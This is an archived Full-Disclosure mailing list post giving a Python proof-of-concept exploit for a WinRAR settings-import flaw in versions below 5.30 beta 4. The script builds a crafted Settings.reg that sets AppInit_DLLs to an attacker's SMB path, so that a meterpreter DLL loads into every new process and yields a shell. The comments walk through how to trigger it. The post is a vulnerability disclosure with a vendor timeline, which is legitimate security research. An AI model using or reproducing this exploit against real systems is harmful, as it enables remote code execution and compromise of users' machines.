lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 2 Oct 2015 11:14:46 +0200
From: Rio Sherri <rio.sherri@...nstudent.info>
To: fulldisclosure@...lists.org
Subject: [FD] WinRar Settings Import Command Execution

#!/usr/bin/python -w

# Title : WinRar Settings Import Command Execution

# Date : 02/10/2015

# Author : R-73eN

# Tested on : Windows 7 Ultimate

# Vulnerable Versions : Winrar < 5.30 beta 4

# The vulnerability exists in the "Import Settings From File" function.

# Since Settings file of Winrar are saved as a registry file and WinRar
executes

# it in an automatic way without checking if it is writing to the Registry
keys

# used by winrar, we can create a specially crafted settings file and we
can

# overwrite registry keys.

# Since we have access to registry there are various ways we could use this
to

# get code execution such as defining "RUN" keys or creating new services
etc

# However the best way to get code execution is using AppInit DLLs

# AppInit DLLs are DLLs that are loaded into any process when it starts.

# In this case, we can specify a meterpreter DLL payload using a UNC path on

# an SMB server we control and then next time a new process starts we will

# get a shell.

# Read more about AppInit Dlls :
https://support.microsoft.com/en-us/kb/197571

#

# Triggering the vulnerability

# 1) Run this python script.

# 2) Open WinRar

# 3) Click Options

# 4) Click Import/Export

# 5) Import Settings from file

# 6) Select the Specially crafted Settings.reg file

#

# Disclosure Timeline:

# 01/10/2015 - Vendor Contacted POC provided

# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify

# presence of [HKEY_CURRENT_USER\Software\WinRAR] or

# [HKEY_CURRENT_USER\Software\WinRAR\

#

#


banner = ""

banner +=" ___ __ ____ _ _ \n"

banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"

banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"

banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"

banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"

print banner

print "[+] WinRar Settings Import Command Execution [+]\n"

dll = raw_input("[+] Enter dll location (smb) : ")

dll = dll.replace("\\","\\\\")

print "[+] Writing Contet To Settings.reg [+]"

evil = 'Windows Registry Editor Version
5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll +
'"\n"LoadAppInit_DLLs"=dword:00000001\n'

print evil

f = open("Settings.reg","w")

f.write(evil)

f.close()

print "[+] Settings.reg created successfully [+]"

print "\n https://www.infogen.al/ \n"

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ